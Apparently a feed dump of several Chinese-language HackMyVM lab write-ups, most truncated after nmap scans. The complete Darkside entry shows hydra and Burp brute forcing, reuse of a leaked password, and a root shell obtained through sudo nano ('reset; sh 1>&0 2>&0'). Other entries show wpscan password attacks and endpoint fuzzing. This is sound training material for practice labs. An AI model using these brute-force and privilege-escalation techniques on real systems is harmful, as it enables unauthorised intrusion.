08:03:36 +0000https://7r1UMPH.github.io/post/hmv_Darkside.html# hmv_Darkside # 0.简介 **靶机**：[hackmyvm - Darkside](https://hackmyvm.eu/machines/machine.php?vm=Darkside) **难度**：绿色 **目标 IP**：192.168.205.134 **本机 IP**：192.168.205.141 # 1.扫描 一号男嘉宾，`nmap`开扫 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.134 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-14 10:42 CST Nmap scan report for 192.168.205.134 Host is up (0.00078s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:2D:1C:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 2.69 seconds ``` 优先查看**http服务**端口，**ssh端口**如果没有进展再进行爆破 # 2.踩点  是个登录页，尝试`sql注入、万能密码、弱密码`均无果，使用`Nikto`进行WEB漏洞扫描 ```bash ┌──(kali㉿kali)-[~/test] └─$ nikto -h 192.168.205.134 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.205.134 + Target Hostname: 192.168.205.134 + Target Port: 80 + Start Time: 2025-01-14 10:43:28 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.56 (Debian) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + No CGI Directories found (use '-C all' to force check all possible dirs) + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /backup/: Directory indexing found. + /backup/: This might be interesting. + 8102 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2025-01-14 10:43:50 (GMT8) (22 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` 有个备份目录，我们去网页查看一下  只有一个`vote.txt`文本文件，给了我们几个用户名，我们拿这几个用户名去尝试爆破ssh服务 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.134/backup/vote.txt|awk -F ':' '{print $1}' % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 205 100 205 0 0 69751 0 --:--:-- --:--:-- --:--:-- 100k rijaba xerosec sml cromiphi gatogamer chema talleyrand d3b0o Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin. ┌──(kali㉿kali)-[~/test] └─$ vim user ┌──(kali㉿kali)-[~/test] └─$ cat user rijaba xerosec sml cromiphi gatogamer chema talleyrand d3b0o kevin ┌──(kali㉿kali)-[~/test] └─$ hydra -L user -P /usr/share/wordlists/q5000.txt ssh://192.168.205.134 -I -u -f -e nsr -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-14 11:04:45 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 45027 login tries (l:9/p:5003), ~704 tries per task [DATA] attacking ssh://192.168.205.134:22/ ``` 爆破的同时，我们用burp也爆破登录页  选这个，设置好参数后启动爆破  按照长度排序，可以发现该组用户密码长度明细不一样，尝试登录  获得了一串类似于base64的字符串，拿去[cyberchef](https://cyberchef.org/)解密  （尴尬了，是base58）输出了一串和网址很像的字符串，我们访问一下  问我们选哪边，我们查看源码  代码是实现了当存在名为 **side** 的 **cookie** 并且它的值是 `darkside`，那么脚本将重定向用户到 URL `hwvhysntovtanj.password`，我懒得改**cookie**了，我们直接访问  获得了一个貌似是**ssh服务**密码，我们尝试一下 ```bash ┌──(kali㉿kali)-[~/test] └─$ ssh kevin@192.168.205.134 The authenticity of host '192.168.205.134 (192.168.205.134)' can't be established. ED25519 key fingerprint is SHA256:pmPw9d2/o54jN+Dmo29Hq6rIzWOQ//VhyZvK4KN6rmk. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.205.134' (ED25519) to the list of known hosts. kevin@192.168.205.134's password: Linux darkside 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Oct 15 15:18:15 2023 from 10.0.2.18 kevin@darkside:~$ id uid=1000(kevin) gid=1000(kevin) groups=1000(kevin) ``` 成功连接 # 3.提权 ```bash kevin@darkside:~$ sudo -l [sudo] password for kevin: Sorry, user kevin may not run sudo on darkside. kevin@darkside:~$ kevin@darkside:~$ ls -la total 32 drwxr-xr-x 3 kevin kevin 4096 Oct 30 2023 . drwxr-xr-x 4 root root 4096 Oct 15 2023 .. lrwxrwxrwx 1 kevin kevin 9 Oct 30 2023 .bash_history -> /dev/null -rw-r--r-- 1 kevin kevin 220 Oct 15 2023 .bash_logout -rw-r--r-- 1 kevin kevin 3526 Oct 15 2023 .bashrc -rw-r--r-- 1 kevin kevin 113 Oct 15 2023 .history drwxr-xr-x 3 kevin kevin 4096 Oct 15 2023 .local -rw-r--r-- 1 kevin kevin 807 Oct 15 2023 .profile -rw-r--r-- 1 kevin kevin 19 Oct 15 2023 user.txt kevin@darkside:~$ cat .history ls -al hostname -I echo 'Congratulations on the OSCP Xerosec' top ps -faux su rijaba ILoveJabita ls /home/rijaba ``` 在家目录发现了`.history`文本文件，查看获得了`rijaba`的密码，尝试登录 ```bash kevin@darkside:~$ su rijaba Password: rijaba@darkside:/home/kevin$ id uid=1001(rijaba) gid=1001(rijaba) groups=1001(rijaba) ``` 继续测试提权 ```bash rijaba@darkside:/home/kevin$ sudo -l Matching Defaults entries for rijaba on darkside: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User rijaba may run the following commands on darkside: (root) NOPASSWD: /usr/bin/nano ``` 可以使用**root**运行`nano`，我们进行提权 ```bash rijaba@darkside:/home/kevin$ sudo /usr/bin/nano ```  进入`nano`按**CTRL+R**，**CTRL+X**，输入`reset; sh 1>&0 2>&0`就提权成功了 。https://7r1UMPH.github.io/post/hmv_Darkside.htmlThu, 20 Mar 2025 08:02:34 +0000https://7r1UMPH.github.io/post/hmv_crack.html# hmv_crack # 0.简介 **靶机**：[hackmyvm - crack](https://hackmyvm.eu/machines/machine.php?vm=crack) **难度**：绿色 **目标 IP**：192.168.205.143 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 15:51 CST Nmap scan report for 192.168.205.143 Host is up (0.00043s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 4200/tcp open vrml-multi-use 12359/tcp open unknown MAC Address: 08:00:27:75:33:75 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds ``` `4000、12359`是什么端口我们不知道，所以我们先看**ftp**端口 # 2.踩点 ```bash ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.143 Connected to 192.168.205.143. 220 (vsFTPd 3.0.3) Name (192.168.205.143:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||50526|) 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Jun 07 2023 upload 226 Directory send OK. ftp> cd upload 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||30618|) 150 Here comes the directory listing. -rwxr-xr-x 1 1000 1000 849 Jun 07 2023 crack.py 226 Directory send OK. ftp> mget crack.py mget crack.py [anpqy?]? y 229 Entering Extended Passive Mode (|||35830|) 150 Opening BINARY mode data connection for crack.py (849 bytes). 100% |*****************************************************************************************| 849 1.71 MiB/s 00:00 ETA 226 Transfer complete. 849 bytes received in 00:00 (799.51 KiB/s) ftp> exit 221 Goodbye. ┌──(kali㉿kali)-[~/test] └─$ cat crack.py import os import socket s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) port = 12359 s.bind(('', port)) s.listen(50) c, addr = s.accept() no = 'NO' while True: try: c.send('File to read:'.encode()) data = c.recv(1024) file = (str(data, 'utf-8').strip()) filename = os.path.basename(file) check = '/srv/ftp/upload/'+filename if os.path.isfile(check) and os.path.isfile(file): f = open(file,'r') lines = f.readlines() lines = str(lines) lines = lines.encode() c.send(lines) else: c.send(no.encode()) except ConnectionResetError: pass ``` 发现了`12359`端口的运行脚本，脚本实现文件读取服务。https://7r1UMPH.github.io/post/hmv_crack.htmlThu, 20 Mar 2025 08:01:32 +0000https://7r1UMPH.github.io/post/hmv_CodeShield.html# hmv_CodeShield # 0.简介 **靶机**：[hackmyvm - CodeShield](https://hackmyvm.eu/machines/machine.php?vm=CodeShield) **难度**：绿色 **目标 IP**：192.168.205.138 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn -sV 192.168.205.138 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 10:33 CST Nmap scan report for 192.168.205.138 Host is up (0.046s latency). Not shown: 65526 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 80/tcp open http nginx 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd (Ubuntu) 443/tcp open ssl/http nginx 993/tcp open imaps? 995/tcp open pop3s? 3389/tcp open ms-wbt-server Microsoft Terminal Service 22222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) MAC Address: 08:00:27:61:49:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.22 seconds ``` 先把我们感兴趣的端口挑出来`21、80、443、22222`，现在就这几个，后面没有头绪再挑 # 2.踩点 我比较喜欢先看ftp21端口。https://7r1UMPH.github.io/post/hmv_CodeShield.htmlThu, 20 Mar 2025 08:00:30 +0000https://7r1UMPH.github.io/post/hmv_Chromatica.html# hmv_Chromatica **靶机**：https://hackmyvm.eu/machines/machine.php?vm\=Chromatica **难度**：绿色 **目标 IP**：192.168.205.215 **本机** IP：192.168.205.141 --- ### **1. 端口枚举及服务探测** 首先，使用 `nmap` 扫描目标 IP 的开放端口： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.215 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 14:18 CST Nmap scan report for 192.168.205.215 Host is up (0.0017s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) 5353/tcp open domain dnsmasq 2.86 MAC Address: 08:00:27:95:39:FD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.66 seconds ``` 扫描结果显示目标机器开放了 22 (SSH) 、 80 (HTTP) 、5353(DNS)端口。https://7r1UMPH.github.io/post/hmv_Chromatica.htmlThu, 20 Mar 2025 07:59:27 +0000https://7r1UMPH.github.io/post/hmv_canto.html# hmv_canto **靶机**：https://hackmyvm.eu/machines/machine.php?vm=canto **难度**：绿色 **目标 IP**：192.168.205.213 **本机** IP：192.168.205.141 --- ### **1. 端口枚举及服务探测** 首先，使用 `nmap` 扫描目标 IP 的开放端口： ```bash ┌──(kali㉿kali)-[~] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.213 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 19:05 CST Nmap scan report for 192.168.205.213 Host is up (0.00026s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.57 ((Ubuntu)) MAC Address: 08:00:27:80:A9:92 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.13 seconds ``` 扫描结果显示目标机器开放了 22 (SSH) 和 80 (HTTP) 端口。https://7r1UMPH.github.io/post/hmv_canto.htmlThu, 20 Mar 2025 07:58:25 +0000https://7r1UMPH.github.io/post/hmv_buster.html# hmv_buster # 0.简介 **靶机**：[hackmyvm - buster](https://hackmyvm.eu/machines/machine.php?vm=buster) **难度**：绿色 **目标 IP**：192.168.205.142 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.142 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-15 20:11 CST Nmap scan report for 192.168.205.142 Host is up (0.00022s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:09:D8:74 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds ``` 先看**80端口**，**22端口**候补 # 2.踩点  是个**wordPress，** 拿**wpscan**扫描一下 ```bash ┌──(kali㉿kali)-[~/test] └─$ wpscan --url http://192.168.205.142/ -e vp,u --api-token xxx #api-token注册wpscan官网获取 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.205.142/ [192.168.205.142] [+] Started: Wed Jan 15 20:13:50 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: nginx/1.14.2 | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://192.168.205.142/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.205.142/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.205.142/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.205.142/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21). | Found By: Meta Generator (Passive Detection) | - http://192.168.205.142/, Match: 'WordPress 6.7.1' | Confirmed By: Rss Generator (Aggressive Detection) | - http://192.168.205.142/feed/, <generator>https://wordpress.org/?v=6.7.1</generator> | - http://192.168.205.142/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator> [i] The main theme could not be detected. [+] Enumerating Vulnerable Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <========================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] ta0 | Found By: Wp Json Api (Aggressive Detection) | - http://192.168.205.142/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Rss Generator (Aggressive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] welcome | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 1 | Requests Remaining: 18 [+] Finished: Wed Jan 15 20:13:57 2025 [+] Requests Done: 53 [+] Cached Requests: 6 [+] Data Sent: 13.267 KB [+] Data Received: 413.04 KB [+] Memory used: 229.277 MB [+] Elapsed time: 00:00:07 ``` 主要的信息有`WordPress 6.7.1`和两个用户名`ta0`、`welcome`，但是`WordPress 6.7.1`没有漏洞，只可以爆破密码了 ```bash ┌──(kali㉿kali)-[~/test] └─$ wpscan -U ta0,welcome -P /usr/share/wordlists/q5000.txt --url http://192.168.205.142/ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ （省略） [+] Performing password attack on Xmlrpc against 2 user/s Trying ta0 / speaker Time: 00:01:37 <=========================================================> (10000 / 10000) 100.00% Time: 00:01:37 [i] No Valid Passwords Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Wed Jan 15 20:18:29 2025 [+] Requests Done: 10142 [+] Cached Requests: 34 [+] Data Sent: 5.147 MB [+] Data Received: 5.559 MB [+] Memory used: 278.031 MB [+] Elapsed time: 00:01:40 ``` 爆破了前5000行`rockyou.txt`都没有结果，没有必要爆破了，根据现在获得的信息无法判断出攻击面，但是`WordPress`靶机还有一个攻击点——**插件** ```bash ┌──(kali㉿kali)-[~/test] └─$ wpscan --url http://192.168.205.142/ -e ap --plugins-detection aggressive --api-token xxx #api-token注册wpscan官网获取 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ （省略） [+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:17:12 <================================================> (108550 / 108550) 100.00% Time: 00:17:12 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] akismet | Location: http://192.168.205.142/wp-content/plugins/akismet/ | Latest Version: 5.3.5 (up to date) | Last Updated: 2024-11-19T02:02:00.000Z | Readme: http://192.168.205.142/wp-content/plugins/akismet/readme.txt | | Found By: Known Locations (Aggressive Detection) | - http://192.168.205.142/wp-content/plugins/akismet/, status: 200 | | Version: 5.3.5 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://192.168.205.142/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://192.168.205.142/wp-content/plugins/akismet/readme.txt [+] feed | Location: http://192.168.205.142/wp-content/plugins/feed/ | | Found By: Known Locations (Aggressive Detection) | - http://192.168.205.142/wp-content/plugins/feed/, status: 200 | | The version could not be determined. [+] wp-query-console | Location: http://192.168.205.142/wp-content/plugins/wp-query-console/ | Latest Version: 1.0 (up to date) | Last Updated: 2018-03-16T16:03:00.000Z | Readme: http://192.168.205.142/wp-content/plugins/wp-query-console/README.txt | | Found By: Known Locations (Aggressive Detection) | - http://192.168.205.142/wp-content/plugins/wp-query-console/, status: 403 | | [!] 1 vulnerability identified: | | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution | References: | - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3 | | Version: 1.0 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://192.168.205.142/wp-content/plugins/wp-query-console/README.txt [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 15 [+] Finished: Wed Jan 15 20:39:16 2025 [+] Requests Done: 108575 [+] Cached Requests: 44 [+] Data Sent: 29.36 MB [+] Data Received: 32.766 MB [+] Memory used: 479.719 MB [+] Elapsed time: 00:17:25 ``` `wp-query-console`有漏洞，我们去搜索一下有没有利用方案。https://7r1UMPH.github.io/post/hmv_buster.htmlThu, 20 Mar 2025 07:57:23 +0000https://7r1UMPH.github.io/post/hmv_Blackhat2.html# hmv_Blackhat2 **靶机**：[HackMyVM - Blackhat2](https://hackmyvm.eu/machines/machine.php?vm=Blackhat2) **难度**：黄色 **目标 IP**：192.168.205.218 **本机 IP**：192.168.205.141 ## 1. 端口枚举及服务探测 首先，使用 `nmap` 扫描目标 IP 的开放端口： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.218 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-31 21:27 CST Nmap scan report for 192.168.205.218 Host is up (0.00034s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.57 ((Debian)) MAC Address: 08:00:27:17:26:A8 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` 从 `nmap` 扫描结果来看，目标机器开放了 22 (SSH) 和 80 (HTTP) 端口。https://7r1UMPH.github.io/post/hmv_Blackhat2.htmlThu, 20 Mar 2025 07:56:22 +0000https://7r1UMPH.github.io/post/hmv_azer.html# hmv_azer # 0.简介 **靶机**：[hackmyvm - azer](https://hackmyvm.eu/machines/machine.php?vm=Azer) **难度**：绿色 **目标 IP**：192.168.205.235 **本机 IP**：192.168.205.141 --- # 1.扫描 使用 `Nmap` 进行初步端口扫描，以识别开放的服务和端口： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS -p- -Pn -n -T4 192.168.205.235 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 11:19 CST Nmap scan report for 192.168.205.235 Host is up (0.00038s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 3000/tcp open ppp MAC Address: 08:00:27:07:E9:02 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds ``` 结果显示两个开放端口： **80/tcp** - HTTP 服务 **3000/tcp** - 原始显示为 PPP，但实际上是一个 web 应用程序，用于用户认证 --- # 2.踩点 `80`端口页没有发现明显利用点，踩点`3000`端口    在进一步探索中发现，**3000** 端口的应用程序似乎通过执行 `.sh` 脚本来进行密码验证。https://7r1UMPH.github.io/post/hmv_azer.htmlThu, 20 Mar 2025 07:55:21 +0000https://7r1UMPH.github.io/post/hmv_aurora.html# hmv_aurora # 0.简介 **靶机**：[hackmyvm - aurora](https://hackmyvm.eu/machines/machine.php?vm=aurora) **难度**：绿色 **目标 IP**：192.168.205.138 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 10:12 CST Nmap scan report for 192.168.205.138 Host is up (0.00044s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp MAC Address: 08:00:27:68:BD:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds ``` **3000**大概率是**web**页面 # 2.踩点 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/ <!DOCTYPE html> <html lang='en'> <head> <meta charset='utf-8'> <title>Error</title> </head> <body> <pre>Cannot GET /</pre> </body> </html> ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/ <!DOCTYPE html> <html lang='en'> <head> <meta charset='utf-8'> <title>Error</title> </head> <body> <pre>Cannot GET /</pre> </body> </html> ``` 禁止`GET`访问，那我们就`POST` ```bash ┌──(kali㉿kali)-[~/test] └─$ feroxbuster -u 'http://192.168.205.138:3000' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md -m POST ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben 'epi' Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.205.138:3000 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, html, txt, md] 🏁 HTTP methods │ [POST] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 POST 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 401 POST 1l 2w 22c http://192.168.205.138:3000/login 400 POST 1l 6w 29c http://192.168.205.138:3000/register 401 POST 1l 2w 22c http://192.168.205.138:3000/Login 400 POST 1l 6w 29c http://192.168.205.138:3000/Register 401 POST 1l 1w 12c http://192.168.205.138:3000/execute ``` 使用`curl`访问 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/login -X POST Identifiants invalides ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/register -X POST The 'role' field is not valid ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/execute -X POST Unauthorized ``` 我们注册一个用户试试 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{\'role\':\'admin\'}' Not authorized ! ``` 啊这，丢去`WFUZZ`爆破一下 ```bash ┌──(kali㉿kali)-[~/test] └─$ wfuzz -c -u 'http://192.168.205.138:3000/register' -X POST -H 'Content-Type: application/json' -d '{\'role\':\'FUZZ\'}' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 --hw 6 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.205.138:3000/register Total requests: 62284 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000003: 401 0 L 3 W 16 Ch 'admin' 000000022: 500 0 L 5 W 32 Ch 'user' Total time: 58.91045 Processed Requests: 62284 Filtered Requests: 62282 Requests/sec.: 1057.265 ``` 继续注册 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{\'role\':\'user\'}' Column 'username' cannot be null ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{\'role\':\'user\',\'username\':\'xxoo\'}' Column 'password' cannot be null ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/register -X POST -H 'Content-Type: application/json' -d '{\'role\':\'user\',\'username\':\'xxoo\',\'password\':\'xxoo\'}' Registration OK ``` 去登录试试 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138:3000/login -X POST -H 'Content-Type: application/json' -d 